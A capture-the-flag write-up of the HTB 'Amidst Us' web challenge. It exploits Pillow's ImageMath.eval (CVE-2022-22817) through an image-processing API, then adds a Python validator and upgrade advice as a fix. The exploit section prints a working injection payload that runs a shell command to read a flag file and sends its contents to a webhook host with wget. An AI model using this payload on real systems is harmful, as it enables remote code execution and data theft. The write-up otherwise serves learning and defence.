Amidst Us

Loading up the page, we see a weird spotlight page à la Among Us, and we have the ability to upload images to replace our two sus peeps.

(Apologies, didn't get a better pic, but there is something there!)

POST /api/alphafy HTTP/1.1

{
    "image": "iVBORw...ElFTkSuQmCC",
    "background": [
        255,
        255,
        255
    ]
}

So it sends a base64-encoded image plus three background colour values. Looking at the source code, we see that these values are passed into Pillow's ImageMath.eval, which has a known CVE:

from PIL import ImageMath

# For each of the three colour channels, the untrusted "background" value
# (color[i], straight from the request body) is handed to ImageMath.eval
# as the "color" binding of the expression.
new_bands = [
    ImageMath.eval(
        'convert((image - color) / alpha + color, "L")',
        image=img_bands[i],
        color=color[i],
        alpha=alpha
    )
    for i in range(3)
]

So if we instead make use of the fact that ImageMath.eval operates on the colour values, we can try to trigger CVE-2022-22817 by putting the following payload in any of the background parameters. It cats the flag file and sends it back to a webhook via wget as a GET parameter:

"exec('import os;os.system(\"flag=$(cat ../flag.txt);wget https://webhook.site/{your_webhook_uuid}?flag=${flag}\")')"

Final payload:

POST /api/alphafy HTTP/1.1

{
    "image": "iVBORw...ElFTkSuQmCC",
    "background": [
        "exec('import os;os.system(\"flag=$(cat ../flag.txt);wget https://webhook.site/{your_webhook_uuid}?flag=${flag}\")')",
        255,
        255
    ]
}

Flag: HTB{i_slept_my_way_to_rce}
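For the fix side of this bug: the handler trusts whatever JSON type arrives in "background", so a string lands in ImageMath.eval's "color" binding. The following is an added hardening example written for this writeup, not the challenge's own code; the function names, the BadBackground exception and the two constructed request bodies are mine, and the validator runs without Pillow installed (PIL is only imported inside alphafy_safe).

```python
import json

# Added hardening example, not the challenge's own code: validate "background"
# before anything reaches ImageMath.eval's "color" binding. Names are my own.

class BadBackground(ValueError):
    """The request body is not {"image": str, "background": [int, int, int]}."""

def validate_background(background):
    """Return (r, g, b) as plain ints in 0..255, or raise BadBackground."""
    # Strings (the injection vector above), floats, bools and out-of-range values all fail.
    if not isinstance(background, (list, tuple)) or len(background) != 3:
        raise BadBackground("background must be a list of exactly 3 values")
    channels = []
    for value in background:
        if isinstance(value, bool) or not isinstance(value, int):  # bool is an int subclass
            raise BadBackground(f"channel must be int, got {type(value).__name__}")
        if not 0 <= value <= 255:
            raise BadBackground(f"channel out of range: {value}")
        channels.append(value)
    return tuple(channels)

def parse_alphafy_request(body):
    """Parse a POST /api/alphafy JSON body into (image_b64, (r, g, b))."""
    data = json.loads(body)
    if not isinstance(data, dict):
        raise BadBackground("body must be a JSON object")
    image = data.get("image")
    if not isinstance(image, str) or not image:
        raise BadBackground("image must be a non-empty base64 string")
    return image, validate_background(data.get("background"))

def request_is_safe(body):
    """True if the body validates; json.JSONDecodeError is a ValueError too."""
    try:
        parse_alphafy_request(body)
        return True
    except ValueError:
        return False

def alphafy_safe(img_bands, alpha, background):
    """The page's ImageMath expression, fed validated ints only."""
    from PIL import ImageMath  # lazy import; also run a Pillow release that fixes CVE-2022-22817
    color = validate_background(background)
    return [ImageMath.eval('convert((image - color) / alpha + color, "L")',
                           image=img_bands[i], color=color[i], alpha=alpha)
            for i in range(3)]

# Constructed bodies: a benign request and one shaped like the payload above.
BENIGN = '{"image": "iVBORw", "background": [255, 255, 255]}'
HOSTILE = '{"image": "iVBORw", "background": ["exec(\'...\')", 255, 255]}'
```

Type checking alone is not a substitute for upgrading Pillow; it just makes sure a request can never choose what ImageMath evaluates.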